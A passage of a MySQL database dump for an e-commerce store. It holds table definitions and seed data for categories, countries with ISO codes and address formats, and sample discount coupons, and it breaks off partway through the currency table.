-- Table structure for table `category_filter`
--

CREATE TABLE `category_filter` (
  `category_id` int(11) NOT NULL,
  `filter_id` int(11) NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `category_path`
--

CREATE TABLE `category_path` (
  `category_id` int(11) NOT NULL,
  `path_id` int(11) NOT NULL,
  `level` int(11) NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Dumping data for table `category_path`
--

INSERT INTO `category_path` (`category_id`, `path_id`, `level`) VALUES
(25, 25, 1),
(28, 28, 2),
(28, 25, 1),
(35, 35, 2),
(35, 20, 1),
(33, 69, 0),
(60, 59, 0),
(60, 60, 1),
(59, 59, 0),
(30, 30, 2),
(30, 25, 1),
(31, 31, 2),
(31, 25, 1),
(32, 32, 2),
(32, 25, 1),
(20, 20, 1),
(27, 27, 2),
(27, 20, 1),
(26, 26, 2),
(26, 20, 1),
(24, 24, 1),
(18, 18, 1),
(45, 45, 2),
(45, 18, 1),
(46, 46, 2),
(46, 18, 1),
(33, 33, 1),
(34, 34, 1),
(24, 69, 0),
(34, 69, 0),
(46, 69, 0),
(45, 69, 0),
(18, 69, 0),
(26, 69, 0),
(27, 69, 0),
(20, 69, 0),
(32, 69, 0),
(31, 69, 0),
(30, 69, 0),
(35, 69, 0),
(28, 69, 0),
(25, 69, 0),
(69, 69, 0),
(174, 171, 1),
(105, 59, 0),
(106, 106, 2),
(106, 108, 1),
(219, 69, 0),
(107, 107, 0),
(108, 108, 1),
(108, 59, 0),
(170, 166, 0),
(109, 109, 0),
(171, 171, 1),
(110, 59, 0),
(168, 167, 1),
(111, 111, 0),
(112, 112, 1),
(112, 59, 0),
(113, 113, 1),
(113, 59, 0),
(171, 166, 0),
(114, 114, 3),
(114, 105, 1),
(172, 172, 2),
(115, 115, 3),
(115, 105, 1),
(116, 105, 1),
(172, 171, 1),
(116, 59, 0),
(117, 117, 3),
(172, 166, 0),
(117, 105, 1),
(118, 107, 0),
(118, 118, 1),
(219, 28, 2),
(119, 119, 1),
(119, 107, 0),
(219, 219, 3),
(120, 120, 1),
(120, 107, 0),
(219, 25, 1),
(121, 107, 0),
(121, 121, 1),
(165, 165, 1),
(122, 109, 0),
(170, 170, 1),
(122, 122, 1),
(123, 109, 0),
(169, 166, 0),
(123, 123, 1),
(124, 109, 0),
(169, 167, 1),
(124, 124, 1),
(169, 169, 2),
(125, 109, 0),
(125, 125, 1),
(126, 113, 1),
(126, 59, 0),
(126, 126, 2),
(127, 59, 0),
(127, 108, 1),
(127, 127, 2),
(215, 215, 1),
(220, 28, 2),
(215, 111, 0),
(129, 129, 2),
(130, 59, 0),
(130, 130, 2),
(130, 108, 1),
(131, 131, 1),
(168, 168, 2),
(131, 111, 0),
(132, 111, 0),
(167, 166, 0),
(132, 132, 1),
(133, 111, 0),
(167, 167, 1),
(133, 133, 1),
(134, 111, 0),
(166, 166, 0),
(134, 134, 1),
(135, 59, 0),
(135, 135, 2),
(135, 113, 1),
(136, 59, 0),
(136, 113, 1),
(136, 136, 2),
(129, 59, 0),
(129, 108, 1),
(137, 59, 0),
(137, 137, 2),
(137, 113, 1),
(220, 220, 4),
(220, 25, 1),
(220, 219, 3),
(220, 69, 0),
(142, 106, 2),
(142, 142, 3),
(142, 59, 0),
(143, 106, 2),
(143, 143, 3),
(143, 59, 0),
(144, 106, 2),
(144, 144, 3),
(144, 59, 0),
(145, 106, 2),
(145, 145, 3),
(145, 59, 0),
(146, 105, 1),
(146, 146, 3),
(173, 173, 2),
(147, 60, 1),
(147, 147, 2),
(147, 59, 0),
(148, 59, 0),
(148, 148, 2),
(148, 60, 1),
(149, 59, 0),
(149, 149, 2),
(149, 60, 1),
(150, 59, 0),
(150, 150, 2),
(150, 60, 1),
(151, 59, 0),
(173, 171, 1),
(151, 105, 1),
(152, 105, 1),
(173, 166, 0),
(152, 59, 0),
(174, 174, 2),
(153, 59, 0),
(153, 153, 2),
(154, 154, 2),
(154, 59, 0),
(154, 60, 1),
(155, 155, 0),
(156, 156, 1),
(156, 155, 0),
(157, 157, 1),
(157, 155, 0),
(158, 158, 1),
(158, 155, 0),
(159, 159, 1),
(159, 155, 0),
(160, 160, 1),
(160, 155, 0),
(161, 161, 1),
(161, 155, 0),
(217, 166, 0),
(216, 216, 1),
(163, 163, 1),
(163, 155, 0),
(106, 59, 0),
(142, 108, 1),
(143, 108, 1),
(144, 108, 1),
(145, 108, 1),
(110, 110, 2),
(114, 59, 0),
(115, 59, 0),
(117, 59, 0),
(146, 59, 0),
(168, 166, 0),
(164, 109, 0),
(164, 164, 1),
(165, 107, 0),
(174, 166, 0),
(175, 175, 0),
(176, 176, 1),
(176, 175, 0),
(222, 222, 1),
(222, 175, 0),
(180, 180, 1),
(180, 175, 0),
(189, 189, 1),
(189, 175, 0),
(196, 196, 0),
(197, 197, 1),
(197, 196, 0),
(198, 198, 1),
(198, 196, 0),
(199, 199, 1),
(199, 196, 0),
(200, 200, 1),
(200, 196, 0),
(218, 218, 1),
(217, 217, 1),
(218, 166, 0),
(216, 109, 0),
(203, 203, 1),
(203, 196, 0),
(204, 204, 1),
(204, 196, 0),
(205, 205, 0),
(206, 206, 1),
(206, 205, 0),
(207, 207, 1),
(207, 205, 0),
(208, 208, 1),
(208, 205, 0),
(214, 111, 0),
(214, 214, 1),
(210, 210, 1),
(210, 205, 0),
(211, 211, 1),
(211, 205, 0),
(110, 105, 1),
(114, 110, 2),
(115, 110, 2),
(116, 116, 2),
(117, 110, 2),
(146, 110, 2),
(151, 151, 2),
(152, 152, 2),
(153, 105, 1),
(105, 105, 1),
(213, 175, 0),
(213, 213, 1),
(221, 221, 0);

-- --------------------------------------------------------

--
-- Table structure for table `category_to_layout`
--

CREATE TABLE `category_to_layout` (
  `category_id` int(11) NOT NULL,
  `store_id` int(11) NOT NULL,
  `layout_id` int(11) NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Dumping data for table `category_to_layout`
--

INSERT INTO `category_to_layout` (`category_id`, `store_id`, `layout_id`) VALUES
(25, 0, 0),
(69, 0, 0),
(59, 0, 0),
(156, 0, 0),
(155, 0, 0),
(168, 0, 0),
(105, 0, 0),
(107, 0, 0),
(109, 0, 0),
(167, 0, 0),
(60, 0, 0),
(112, 0, 0),
(113, 0, 0),
(111, 0, 0),
(166, 0, 0),
(27, 0, 0),
(108, 0, 0),
(147, 0, 0),
(152, 0, 0),
(116, 0, 0),
(110, 0, 0),
(151, 0, 0),
(153, 0, 0),
(117, 0, 0),
(146, 0, 0),
(114, 0, 0),
(115, 0, 0),
(120, 0, 0),
(118, 0, 0),
(121, 0, 0),
(119, 0, 0),
(125, 0, 0),
(123, 0, 0),
(122, 0, 0),
(124, 0, 0),
(164, 0, 0),
(149, 0, 0),
(148, 0, 0),
(154, 0, 0),
(150, 0, 0),
(137, 0, 0),
(135, 0, 0),
(136, 0, 0),
(220, 0, 0),
(126, 0, 0),
(131, 0, 0),
(132, 0, 0),
(134, 0, 0),
(133, 0, 0),
(219, 0, 0),
(130, 0, 0),
(24, 0, 0),
(106, 0, 0),
(160, 0, 0),
(144, 0, 0),
(159, 0, 0),
(145, 0, 0),
(158, 0, 0),
(143, 0, 0),
(33, 0, 0),
(142, 0, 0),
(218, 0, 0),
(217, 0, 0),
(163, 0, 0),
(129, 0, 0),
(161, 0, 0),
(127, 0, 0),
(215, 0, 0),
(165, 0, 0),
(169, 0, 0),
(170, 0, 0),
(171, 0, 0),
(172, 0, 0),
(173, 0, 0),
(174, 0, 0),
(175, 0, 0),
(176, 0, 0),
(222, 0, 0),
(180, 0, 0),
(189, 0, 0),
(196, 0, 0),
(197, 0, 0),
(198, 0, 0),
(199, 0, 0),
(200, 0, 0),
(157, 0, 0),
(216, 0, 0),
(203, 0, 0),
(204, 0, 0),
(205, 0, 0),
(206, 0, 0),
(207, 0, 0),
(208, 0, 0),
(214, 0, 0),
(210, 0, 0),
(211, 0, 0),
(213, 0, 0),
(221, 0, 0);

-- --------------------------------------------------------

--
-- Table structure for table `category_to_store`
--

CREATE TABLE `category_to_store` (
  `category_id` int(11) NOT NULL,
  `store_id` int(11) NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Dumping data for table `category_to_store`
--

INSERT INTO `category_to_store` (`category_id`, `store_id`) VALUES
(18, 0),
(20, 0),
(24, 0),
(25, 0),
(26, 0),
(27, 0),
(28, 0),
(30, 0),
(31, 0),
(32, 0),
(33, 0),
(34, 0),
(35, 0),
(45, 0),
(46, 0),
(59, 0),
(60, 0),
(69, 0),
(105, 0),
(106, 0),
(107, 0),
(108, 0),
(109, 0),
(110, 0),
(111, 0),
(112, 0),
(113, 0),
(114, 0),
(115, 0),
(116, 0),
(117, 0),
(118, 0),
(119, 0),
(120, 0),
(121, 0),
(122, 0),
(123, 0),
(124, 0),
(125, 0),
(126, 0),
(127, 0),
(129, 0),
(130, 0),
(131, 0),
(132, 0),
(133, 0),
(134, 0),
(135, 0),
(136, 0),
(137, 0),
(142, 0),
(143, 0),
(144, 0),
(145, 0),
(146, 0),
(147, 0),
(148, 0),
(149, 0),
(150, 0),
(151, 0),
(152, 0),
(153, 0),
(154, 0),
(155, 0),
(156, 0),
(157, 0),
(158, 0),
(159, 0),
(160, 0),
(161, 0),
(163, 0),
(164, 0),
(165, 0),
(166, 0),
(167, 0),
(168, 0),
(169, 0),
(170, 0),
(171, 0),
(172, 0),
(173, 0),
(174, 0),
(175, 0),
(176, 0),
(180, 0),
(189, 0),
(196, 0),
(197, 0),
(198, 0),
(199, 0),
(200, 0),
(203, 0),
(204, 0),
(205, 0),
(206, 0),
(207, 0),
(208, 0),
(210, 0),
(211, 0),
(213, 0),
(214, 0),
(215, 0),
(216, 0),
(217, 0),
(218, 0),
(219, 0),
(220, 0),
(221, 0),
(222, 0);

-- --------------------------------------------------------

--
-- Table structure for table `country`
--

CREATE TABLE `country` (
  `country_id` int(11) NOT NULL,
  `name` varchar(128) NOT NULL,
  `iso_code_2` varchar(2) NOT NULL,
  `iso_code_3` varchar(3) NOT NULL,
  `address_format` text NOT NULL,
  `postcode_required` tinyint(1) NOT NULL,
  `status` tinyint(1) NOT NULL DEFAULT 1
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Dumping data for table `country`
--

INSERT INTO `country` (`country_id`, `name`, `iso_code_2`, `iso_code_3`, `address_format`, `postcode_required`, `status`) VALUES
(1, 'Afghanistan', 'AF', 'AFG', '', 0, 1),
(2, 'Albania', 'AL', 'ALB', '', 0, 1),
(3, 'Algeria', 'DZ', 'DZA', '', 0, 1),
(4, 'American Samoa', 'AS', 'ASM', '', 0, 1),
(5, 'Andorra', 'AD', 'AND', '', 0, 1),
(6, 'Angola', 'AO', 'AGO', '', 0, 1),
(7, 'Anguilla', 'AI', 'AIA', '', 0, 1),
(8, 'Antarctica', 'AQ', 'ATA', '', 0, 1),
(9, 'Antigua and Barbuda', 'AG', 'ATG', '', 0, 1),
(10, 'Argentina', 'AR', 'ARG', '', 0, 1),
(11, 'Armenia', 'AM', 'ARM', '', 0, 1),
(12, 'Aruba', 'AW', 'ABW', '', 0, 1),
(13, 'Australia', 'AU', 'AUS', '', 0, 1),
(14, 'Austria', 'AT', 'AUT', '', 0, 1),
(15, 'Azerbaijan', 'AZ', 'AZE', '', 0, 1),
(16, 'Bahamas', 'BS', 'BHS', '', 0, 1),
(17, 'Bahrain', 'BH', 'BHR', '', 0, 1),
(18, 'Bangladesh', 'BD', 'BGD', '', 0, 1),
(19, 'Barbados', 'BB', 'BRB', '', 0, 1),
(20, 'Belarus', 'BY', 'BLR', '', 0, 1),
(21, 'Belgium', 'BE', 'BEL', '{firstname} {lastname}\r\n{company}\r\n{address_1}\r\n{address_2}\r\n{postcode} {city}\r\n{country}', 0, 1),
(22, 'Belize', 'BZ', 'BLZ', '', 0, 1),
(23, 'Benin', 'BJ', 'BEN', '', 0, 1),
(24, 'Bermuda', 'BM', 'BMU', '', 0, 1),
(25, 'Bhutan', 'BT', 'BTN', '', 0, 1),
(26, 'Bolivia', 'BO', 'BOL', '', 0, 1),
(27, 'Bosnia and Herzegovina', 'BA', 'BIH', '', 0, 1),
(28, 'Botswana', 'BW', 'BWA', '', 0, 1),
(29, 'Bouvet Island', 'BV', 'BVT', '', 0, 1),
(30, 'Brazil', 'BR', 'BRA', '', 0, 1),
(31, 'British Indian Ocean Territory', 'IO', 'IOT', '', 0, 1),
(32, 'Brunei Darussalam', 'BN', 'BRN', '', 0, 1),
(33, 'Bulgaria', 'BG', 'BGR', '', 0, 1),
(34, 'Burkina Faso', 'BF', 'BFA', '', 0, 1),
(35, 'Burundi', 'BI', 'BDI', '', 0, 1),
(36, 'Cambodia', 'KH', 'KHM', '', 0, 1),
(37, 'Cameroon', 'CM', 'CMR', '', 0, 1),
(38, 'Canada', 'CA', 'CAN', '', 0, 1),
(39, 'Cape Verde', 'CV', 'CPV', '', 0, 1),
(40, 'Cayman Islands', 'KY', 'CYM', '', 0, 1),
(41, 'Central African Republic', 'CF', 'CAF', '', 0, 1),
(42, 'Chad', 'TD', 'TCD', '', 0, 1),
(43, 'Chile', 'CL', 'CHL', '', 0, 1),
(44, 'China', 'CN', 'CHN', '', 0, 1),
(45, 'Christmas Island', 'CX', 'CXR', '', 0, 1),
(46, 'Cocos (Keeling) Islands', 'CC', 'CCK', '', 0, 1),
(47, 'Colombia', 'CO', 'COL', '', 0, 1),
(48, 'Comoros', 'KM', 'COM', '', 0, 1),
(49, 'Congo', 'CG', 'COG', '', 0, 1),
(50, 'Cook Islands', 'CK', 'COK', '', 0, 1),
(51, 'Costa Rica', 'CR', 'CRI', '', 0, 1),
(52, 'Cote D\'Ivoire', 'CI', 'CIV', '', 0, 1),
(53, 'Croatia', 'HR', 'HRV', '', 0, 1),
(54, 'Cuba', 'CU', 'CUB', '', 0, 1),
(55, 'Cyprus', 'CY', 'CYP', '', 0, 1),
(56, 'Czech Republic', 'CZ', 'CZE', '', 0, 1),
(57, 'Denmark', 'DK', 'DNK', '', 0, 1),
(58, 'Djibouti', 'DJ', 'DJI', '', 0, 1),
(59, 'Dominica', 'DM', 'DMA', '', 0, 1),
(60, 'Dominican Republic', 'DO', 'DOM', '', 0, 1),
(61, 'East Timor', 'TL', 'TLS', '', 0, 1),
(62, 'Ecuador', 'EC', 'ECU', '', 0, 1),
(63, 'Egypt', 'EG', 'EGY', '', 0, 1),
(64, 'El Salvador', 'SV', 'SLV', '', 0, 1),
(65, 'Equatorial Guinea', 'GQ', 'GNQ', '', 0, 1),
(66, 'Eritrea', 'ER', 'ERI', '', 0, 1),
(67, 'Estonia', 'EE', 'EST', '', 0, 1),
(68, 'Ethiopia', 'ET', 'ETH', '', 0, 1),
(69, 'Falkland Islands (Malvinas)', 'FK', 'FLK', '', 0, 1),
(70, 'Faroe Islands', 'FO', 'FRO', '', 0, 1),
(71, 'Fiji', 'FJ', 'FJI', '', 0, 1),
(72, 'Finland', 'FI', 'FIN', '', 0, 1),
(74, 'France, Metropolitan', 'FR', 'FRA', '{firstname} {lastname}\r\n{company}\r\n{address_1}\r\n{address_2}\r\n{postcode} {city}\r\n{country}', 1, 1),
(75, 'French Guiana', 'GF', 'GUF', '', 0, 1),
(76, 'French Polynesia', 'PF', 'PYF', '', 0, 1),
(77, 'French Southern Territories', 'TF', 'ATF', '', 0, 1),
(78, 'Gabon', 'GA', 'GAB', '', 0, 1),
(79, 'Gambia', 'GM', 'GMB', '', 0, 1),
(80, 'Georgia', 'GE', 'GEO', '', 0, 1),
(81, 'Germany', 'DE', 'DEU', '{company}\r\n{firstname} {lastname}\r\n{address_1}\r\n{address_2}\r\n{postcode} {city}\r\n{country}', 1, 1),
(82, 'Ghana', 'GH', 'GHA', '', 0, 1),
(83, 'Gibraltar', 'GI', 'GIB', '', 0, 1),
(84, 'Greece', 'GR', 'GRC', '', 0, 1),
(85, 'Greenland', 'GL', 'GRL', '', 0, 1),
(86, 'Grenada', 'GD', 'GRD', '', 0, 1),
(87, 'Guadeloupe', 'GP', 'GLP', '', 0, 1),
(88, 'Guam', 'GU', 'GUM', '', 0, 1),
(89, 'Guatemala', 'GT', 'GTM', '', 0, 1),
(90, 'Guinea', 'GN', 'GIN', '', 0, 1),
(91, 'Guinea-Bissau', 'GW', 'GNB', '', 0, 1),
(92, 'Guyana', 'GY', 'GUY', '', 0, 1),
(93, 'Haiti', 'HT', 'HTI', '', 0, 1),
(94, 'Heard and Mc Donald Islands', 'HM', 'HMD', '', 0, 1),
(95, 'Honduras', 'HN', 'HND', '', 0, 1),
(96, 'Hong Kong', 'HK', 'HKG', '', 0, 1),
(97, 'Hungary', 'HU', 'HUN', '', 0, 1),
(98, 'Iceland', 'IS', 'ISL', '', 0, 1),
(99, 'India', 'IN', 'IND', '', 0, 1),
(100, 'Indonesia', 'ID', 'IDN', '', 0, 1),
(101, 'Iran (Islamic Republic of)', 'IR', 'IRN', '', 0, 1),
(102, 'Iraq', 'IQ', 'IRQ', '', 0, 1),
(103, 'Ireland', 'IE', 'IRL', '', 0, 1),
(104, 'Israel', 'IL', 'ISR', '', 0, 1),
(105, 'Italy', 'IT', 'ITA', '', 0, 1),
(106, 'Jamaica', 'JM', 'JAM', '', 0, 1),
(107, 'Japan', 'JP', 'JPN', '', 0, 1),
(108, 'Jordan', 'JO', 'JOR', '', 0, 1),
(109, 'Kazakhstan', 'KZ', 'KAZ', '', 0, 1),
(110, 'Kenya', 'KE', 'KEN', '', 0, 1),
(111, 'Kiribati', 'KI', 'KIR', '', 0, 1),
(112, 'North Korea', 'KP', 'PRK', '', 0, 1),
(113, 'South Korea', 'KR', 'KOR', '', 0, 1),
(114, 'Kuwait', 'KW', 'KWT', '', 0, 1),
(115, 'Kyrgyzstan', 'KG', 'KGZ', '', 0, 1),
(116, 'Lao People\'s Democratic Republic', 'LA', 'LAO', '', 0, 1),
(117, 'Latvia', 'LV', 'LVA', '', 0, 1),
(118, 'Lebanon', 'LB', 'LBN', '', 0, 1),
(119, 'Lesotho', 'LS', 'LSO', '', 0, 1),
(120, 'Liberia', 'LR', 'LBR', '', 0, 1),
(121, 'Libyan Arab Jamahiriya', 'LY', 'LBY', '', 0, 1),
(122, 'Liechtenstein', 'LI', 'LIE', '', 0, 1),
(123, 'Lithuania', 'LT', 'LTU', '', 0, 1),
(124, 'Luxembourg', 'LU', 'LUX', '', 0, 1),
(125, 'Macau', 'MO', 'MAC', '', 0, 1),
(126, 'FYROM', 'MK', 'MKD', '', 0, 1),
(127, 'Madagascar', 'MG', 'MDG', '', 0, 1),
(128, 'Malawi', 'MW', 'MWI', '', 0, 1),
(129, 'Malaysia', 'MY', 'MYS', '', 0, 1),
(130, 'Maldives', 'MV', 'MDV', '', 0, 1),
(131, 'Mali', 'ML', 'MLI', '', 0, 1),
(132, 'Malta', 'MT', 'MLT', '', 0, 1),
(133, 'Marshall Islands', 'MH', 'MHL', '', 0, 1),
(134, 'Martinique', 'MQ', 'MTQ', '', 0, 1),
(135, 'Mauritania', 'MR', 'MRT', '', 0, 1),
(136, 'Mauritius', 'MU', 'MUS', '', 0, 1),
(137, 'Mayotte', 'YT', 'MYT', '', 0, 1),
(138, 'Mexico', 'MX', 'MEX', '', 0, 1),
(139, 'Micronesia, Federated States of', 'FM', 'FSM', '', 0, 1),
(140, 'Moldova, Republic of', 'MD', 'MDA', '', 0, 1),
(141, 'Monaco', 'MC', 'MCO', '', 0, 1),
(142, 'Mongolia', 'MN', 'MNG', '', 0, 1),
(143, 'Montserrat', 'MS', 'MSR', '', 0, 1),
(144, 'Morocco', 'MA', 'MAR', '', 0, 1),
(145, 'Mozambique', 'MZ', 'MOZ', '', 0, 1),
(146, 'Myanmar', 'MM', 'MMR', '', 0, 1),
(147, 'Namibia', 'NA', 'NAM', '', 0, 1),
(148, 'Nauru', 'NR', 'NRU', '', 0, 1),
(149, 'Nepal', 'NP', 'NPL', '', 0, 1),
(150, 'Netherlands', 'NL', 'NLD', '', 0, 1),
(151, 'Netherlands Antilles', 'AN', 'ANT', '', 0, 1),
(152, 'New Caledonia', 'NC', 'NCL', '', 0, 1),
(153, 'New Zealand', 'NZ', 'NZL', '', 0, 1),
(154, 'Nicaragua', 'NI', 'NIC', '', 0, 1),
(155, 'Niger', 'NE', 'NER', '', 0, 1),
(156, 'Nigeria', 'NG', 'NGA', '', 0, 1),
(157, 'Niue', 'NU', 'NIU', '', 0, 1),
(158, 'Norfolk Island', 'NF', 'NFK', '', 0, 1),
(159, 'Northern Mariana Islands', 'MP', 'MNP', '', 0, 1),
(160, 'Norway', 'NO', 'NOR', '', 0, 1),
(161, 'Oman', 'OM', 'OMN', '', 0, 1),
(162, 'Pakistan', 'PK', 'PAK', '', 0, 1),
(163, 'Palau', 'PW', 'PLW', '', 0, 1),
(164, 'Panama', 'PA', 'PAN', '', 0, 1),
(165, 'Papua New Guinea', 'PG', 'PNG', '', 0, 1),
(166, 'Paraguay', 'PY', 'PRY', '', 0, 1),
(167, 'Peru', 'PE', 'PER', '', 0, 1),
(168, 'Philippines', 'PH', 'PHL', '', 0, 1),
(169, 'Pitcairn', 'PN', 'PCN', '', 0, 1),
(170, 'Poland', 'PL', 'POL', '', 0, 1),
(171, 'Portugal', 'PT', 'PRT', '', 0, 1),
(172, 'Puerto Rico', 'PR', 'PRI', '', 0, 1),
(173, 'Qatar', 'QA', 'QAT', '', 0, 1),
(174, 'Reunion', 'RE', 'REU', '', 0, 1),
(175, 'Romania', 'RO', 'ROM', '', 0, 1),
(176, 'Russian Federation', 'RU', 'RUS', '', 0, 1),
(177, 'Rwanda', 'RW', 'RWA', '', 0, 1),
(178, 'Saint Kitts and Nevis', 'KN', 'KNA', '', 0, 1),
(179, 'Saint Lucia', 'LC', 'LCA', '', 0, 1),
(180, 'Saint Vincent and the Grenadines', 'VC', 'VCT', '', 0, 1),
(181, 'Samoa', 'WS', 'WSM', '', 0, 1),
(182, 'San Marino', 'SM', 'SMR', '', 0, 1),
(183, 'Sao Tome and Principe', 'ST', 'STP', '', 0, 1),
(184, 'Saudi Arabia', 'SA', 'SAU', '', 0, 1),
(185, 'Senegal', 'SN', 'SEN', '', 0, 1),
(186, 'Seychelles', 'SC', 'SYC', '', 0, 1),
(187, 'Sierra Leone', 'SL', 'SLE', '', 0, 1),
(188, 'Singapore', 'SG', 'SGP', '', 0, 1),
(189, 'Slovak Republic', 'SK', 'SVK', '{firstname} {lastname}\r\n{company}\r\n{address_1}\r\n{address_2}\r\n{city} {postcode}\r\n{zone}\r\n{country}', 0, 1),
(190, 'Slovenia', 'SI', 'SVN', '', 0, 1),
(191, 'Solomon Islands', 'SB', 'SLB', '', 0, 1),
(192, 'Somalia', 'SO', 'SOM', '', 0, 1),
(193, 'South Africa', 'ZA', 'ZAF', '', 0, 1),
(194, 'South Georgia &amp; South Sandwich Islands', 'GS', 'SGS', '', 0, 1),
(195, 'Spain', 'ES', 'ESP', '', 0, 1),
(196, 'Sri Lanka', 'LK', 'LKA', '', 0, 1),
(197, 'St. Helena', 'SH', 'SHN', '', 0, 1),
(198, 'St. Pierre and Miquelon', 'PM', 'SPM', '', 0, 1),
(199, 'Sudan', 'SD', 'SDN', '', 0, 1),
(200, 'Suriname', 'SR', 'SUR', '', 0, 1),
(201, 'Svalbard and Jan Mayen Islands', 'SJ', 'SJM', '', 0, 1),
(202, 'Swaziland', 'SZ', 'SWZ', '', 0, 1),
(203, 'Sweden', 'SE', 'SWE', '{company}\r\n{firstname} {lastname}\r\n{address_1}\r\n{address_2}\r\n{postcode} {city}\r\n{country}', 1, 1),
(204, 'Switzerland', 'CH', 'CHE', '', 0, 1),
(205, 'Syrian Arab Republic', 'SY', 'SYR', '', 0, 1),
(206, 'Taiwan', 'TW', 'TWN', '', 0, 1),
(207, 'Tajikistan', 'TJ', 'TJK', '', 0, 1),
(208, 'Tanzania, United Republic of', 'TZ', 'TZA', '', 0, 1),
(209, 'Thailand', 'TH', 'THA', '', 0, 1),
(210, 'Togo', 'TG', 'TGO', '', 0, 1),
(211, 'Tokelau', 'TK', 'TKL', '', 0, 1),
(212, 'Tonga', 'TO', 'TON', '', 0, 1),
(213, 'Trinidad and Tobago', 'TT', 'TTO', '', 0, 1),
(214, 'Tunisia', 'TN', 'TUN', '', 0, 1),
(215, 'Turkey', 'TR', 'TUR', '', 0, 1),
(216, 'Turkmenistan', 'TM', 'TKM', '', 0, 1),
(217, 'Turks and Caicos Islands', 'TC', 'TCA', '', 0, 1),
(218, 'Tuvalu', 'TV', 'TUV', '', 0, 1),
(219, 'Uganda', 'UG', 'UGA', '', 0, 1),
(220, 'Ukraine', 'UA', 'UKR', '', 0, 1),
(221, 'United Arab Emirates', 'AE', 'ARE', '', 0, 1),
(222, 'United Kingdom', 'GB', 'GBR', '', 1, 1),
(223, 'United States', 'US', 'USA', '{firstname} {lastname}\r\n{company}\r\n{address_1}\r\n{address_2}\r\n{city}, {zone} {postcode}\r\n{country}', 0, 1),
(224, 'United States Minor Outlying Islands', 'UM', 'UMI', '', 0, 1),
(225, 'Uruguay', 'UY', 'URY', '', 0, 1),
(226, 'Uzbekistan', 'UZ', 'UZB', '', 0, 1),
(227, 'Vanuatu', 'VU', 'VUT', '', 0, 1),
(228, 'Vatican City State (Holy See)', 'VA', 'VAT', '', 0, 1),
(229, 'Venezuela', 'VE', 'VEN', '', 0, 1),
(230, 'Viet Nam', 'VN', 'VNM', '', 0, 1),
(231, 'Virgin Islands (British)', 'VG', 'VGB', '', 0, 1),
(232, 'Virgin Islands (U.S.)', 'VI', 'VIR', '', 0, 1),
(233, 'Wallis and Futuna Islands', 'WF', 'WLF', '', 0, 1),
(234, 'Western Sahara', 'EH', 'ESH', '', 0, 1),
(235, 'Yemen', 'YE', 'YEM', '', 0, 1),
(237, 'Democratic Republic of Congo', 'CD', 'COD', '', 0, 1),
(238, 'Zambia', 'ZM', 'ZMB', '', 0, 1),
(239, 'Zimbabwe', 'ZW', 'ZWE', '', 0, 1),
(242, 'Montenegro', 'ME', 'MNE', '', 0, 1),
(243, 'Serbia', 'RS', 'SRB', '', 0, 1),
(244, 'Aaland Islands', 'AX', 'ALA', '', 0, 1),
(245, 'Bonaire, Sint Eustatius and Saba', 'BQ', 'BES', '', 0, 1),
(246, 'Curacao', 'CW', 'CUW', '', 0, 1),
(247, 'Palestinian Territory, Occupied', 'PS', 'PSE', '', 0, 1),
(248, 'South Sudan', 'SS', 'SSD', '', 0, 1),
(249, 'St. Barthelemy', 'BL', 'BLM', '', 0, 1),
(250, 'St. Martin (French part)', 'MF', 'MAF', '', 0, 1),
(251, 'Canary Islands', 'IC', 'ICA', '', 0, 1),
(252, 'Ascension Island (British)', 'AC', 'ASC', '', 0, 1),
(253, 'Kosovo, Republic of', 'XK', 'UNK', '', 0, 1),
(254, 'Isle of Man', 'IM', 'IMN', '', 0, 1),
(255, 'Tristan da Cunha', 'TA', 'SHN', '', 0, 1),
(256, 'Guernsey', 'GG', 'GGY', '', 0, 1),
(257, 'Jersey', 'JE', 'JEY', '', 0, 1);

-- --------------------------------------------------------

--
-- Table structure for table `coupon`
--

CREATE TABLE `coupon` (
  `coupon_id` int(11) NOT NULL,
  `name` varchar(128) NOT NULL,
  `code` varchar(20) NOT NULL,
  `type` char(1) NOT NULL,
  `discount` decimal(15,4) NOT NULL,
  `logged` tinyint(1) NOT NULL,
  `shipping` tinyint(1) NOT NULL,
  `total` decimal(15,4) NOT NULL,
  `date_start` date NOT NULL DEFAULT '0000-00-00',
  `date_end` date NOT NULL DEFAULT '0000-00-00',
  `uses_total` int(11) NOT NULL,
  `uses_customer` varchar(11) NOT NULL,
  `status` tinyint(1) NOT NULL,
  `date_added` datetime NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Dumping data for table `coupon`
--

INSERT INTO `coupon` (`coupon_id`, `name`, `code`, `type`, `discount`, `logged`, `shipping`, `total`, `date_start`, `date_end`, `uses_total`, `uses_customer`, `status`, `date_added`) VALUES
(4, '-10% Discount', '2222', 'P', 10.0000, 0, 0, 0.0000, '2014-01-01', '2020-01-01', 10, '10', 0, '2009-01-27 13:55:03'),
(5, 'Free Shipping', '3333', 'P', 0.0000, 0, 1, 100.0000, '2014-01-01', '2014-02-01', 10, '10', 0, '2009-03-14 21:13:53'),
(6, '-10.00 Discount', '1111', 'F', 10.0000, 0, 0, 10.0000, '2014-01-01', '2020-01-01', 100000, '10000', 0, '2009-03-14 21:15:18');

-- --------------------------------------------------------

--
-- Table structure for table `coupon_category`
--

CREATE TABLE `coupon_category` (
  `coupon_id` int(11) NOT NULL,
  `category_id` int(11) NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `coupon_history`
--

CREATE TABLE `coupon_history` (
  `coupon_history_id` int(11) NOT NULL,
  `coupon_id` int(11) NOT NULL,
  `order_id` int(11) NOT NULL,
  `customer_id` int(11) NOT NULL,
  `amount` decimal(15,4) NOT NULL,
  `date_added` datetime NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `coupon_product`
--

CREATE TABLE `coupon_product` (
  `coupon_product_id` int(11) NOT NULL,
  `coupon_id` int(11) NOT NULL,
  `product_id` int(11) NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `currency`
--

CREATE TABLE `currency` (
  `currency_id` int(11) NOT NULL,
  `title` varchar(32) NOT NULL,
  `code` varchar(3) NOT NULL,
  `symbol_left` varchar(12) NOT NULL,
  `symbol_right` varchar(12) NOT NULL,
  `decimal_place` char(1) NOT NULL,
